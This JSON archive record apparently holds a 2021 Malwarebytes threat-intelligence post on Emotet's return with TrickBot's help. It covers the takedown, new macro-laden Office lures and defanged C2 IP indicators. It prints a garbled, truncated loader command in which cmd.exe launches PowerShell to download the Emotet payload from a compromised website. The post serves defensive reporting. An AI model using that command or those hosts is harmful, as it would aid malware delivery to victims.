{
	"id": "13998059-f79a-4d26-b6f9-20ffe0b0eabd",
	"created_at": "2026-04-06T00:08:10.310174Z",
	"updated_at": "2026-04-10T13:11:39.461273Z",
	"deleted_at": null,
	"sha1_hash": "80a32303a5e50822fd838ed2df158d471e096fca",
	"title": "TrickBot helps Emotet come back from the dead",
	"llm_title": "",
	"authors": "",
	"file_creation_date": "0001-01-01T00:00:00Z",
	"file_modification_date": "0001-01-01T00:00:00Z",
	"file_size": 689225,
	"plain_text": "TrickBot helps Emotet come back from the dead\r\nBy Mark Stockley\r\nPublished: 2021-11-15 · Archived: 2026-04-05 17:55:11 UTC\r\nProbably one of the best known threats for the past several years, Emotet has always been under intense scrutiny\r\nfrom the infosec community. On several occasions, it appeared to take an early retirement, but then again it came\r\nback.\r\nHowever, when multiple law enforcement agencies seized control of its botnet and took it down in January 2021,\r\nconfidence was much higher that Emotet and the people behind had finally called it quits. Not only had the\r\ninfrastructure been dismantled, but previously infected computers had received a special update that would\r\neffectively remove the malware at a specific date.\r\nOut of the woods again\r\nArticle continues below this ad.\r\nOn November 15, security researchers who’ve tracked Emotet announced that the threat was back. Emotet’s long-time partner in crime TrickBot was helping it out by using already infected machines to download the new Emotet\r\nbinary.\r\nTo prove this was no hiccup, malspam campaigns distributing Emotet resumed as well with the classic Office\r\ndocument lures containing macros.\r\nhttps://blog.malwarebytes.com/threat-intelligence/2021/11/trickbot-helps-emotet-come-back-from-the-dead/\r\nPage 1 of 4\n\nThese documents with extension .doc(m) and .xls(m) are the initial loader that will call out to one of several\r\ncompromised websites to retrieve the Emotet payload proper using the following command:\r\nC:WindowsSystem32cmd.exe C:WindowsSystem32cmd.exe c start B powershell $dfkj=$strs=http:visteme.mxsho\r\nhttps://blog.malwarebytes.com/threat-intelligence/2021/11/trickbot-helps-emotet-come-back-from-the-dead/\r\nPage 2 of 4\n\nAfter execution, Emotet will talk to its command and control (C2) servers and await further instructions.\r\nA return of malspam waves and ransomware?\r\nSo far everything indicates that Emotet has restarted their successful enterprise. We should expect malspam\r\ncampaigns to ramp up in the coming weeks.\r\nIn the past month, there have been a number of arrests against ransomware operators, along with the creation of\r\ntaskforces collaborating across borders. The return of Emotet could very well mean an increase in ransomware\r\nattacks.\r\nMalwarebytes users are already protected against Emotet thanks to our anti-exploit layer blocking the malicious\r\ndocuments from downloading their payload.\r\nhttps://blog.malwarebytes.com/threat-intelligence/2021/11/trickbot-helps-emotet-come-back-from-the-dead/\r\nPage 3 of 4\n\nIndicators of Compromise (IOCs)\r\nEmotet C2 servers:\r\n103[.]75[.]201[.]2\r\n103[.]8[.]26[.]102\r\n103[.]8[.]26[.]103\r\n104[.]251[.]214[.]46\r\n138[.]185[.]72[.]26\r\n178[.]79[.]147[.]66\r\n185[.]184[.]25[.]237\r\n188[.]93[.]125[.]116\r\n195[.]154[.]133[.]20\r\n207[.]38[.]84[.]195\r\n210[.]57[.]217[.]132\r\n212[.]237[.]5[.]209\r\n45[.]118[.]135[.]203\r\n45[.]142[.]114[.]231\r\n45[.]76[.]176[.]10\r\n51[.]68[.]175[.]8\r\n58[.]227[.]42[.]236\r\n66[.]42[.]55[.]5\r\n81[.]0[.]236[.]93\r\n94[.]177[.]248[.]64\r\nSource: https://blog.malwarebytes.com/threat-intelligence/2021/11/trickbot-helps-emotet-come-back-from-the-dead/\r\nhttps://blog.malwarebytes.com/threat-intelligence/2021/11/trickbot-helps-emotet-come-back-from-the-dead/\r\nPage 4 of 4",
	"extraction_quality": 1,
	"language": "EN",
	"sources": [
		"Malpedia"
	],
	"origins": [
		"web"
	],
	"references": [
		"https://blog.malwarebytes.com/threat-intelligence/2021/11/trickbot-helps-emotet-come-back-from-the-dead/"
	],
	"report_names": [
		"trickbot-helps-emotet-come-back-from-the-dead"
	],
	"threat_actors": [],
	"ts_created_at": 1775434090,
	"ts_updated_at": 1775826699,
	"ts_creation_date": 0,
	"ts_modification_date": 0,
	"files": {
		"pdf": "https://archive.orkl.eu/80a32303a5e50822fd838ed2df158d471e096fca.pdf",
		"text": "https://archive.orkl.eu/80a32303a5e50822fd838ed2df158d471e096fca.txt",
		"img": "https://archive.orkl.eu/80a32303a5e50822fd838ed2df158d471e096fca.jpg"
	}
}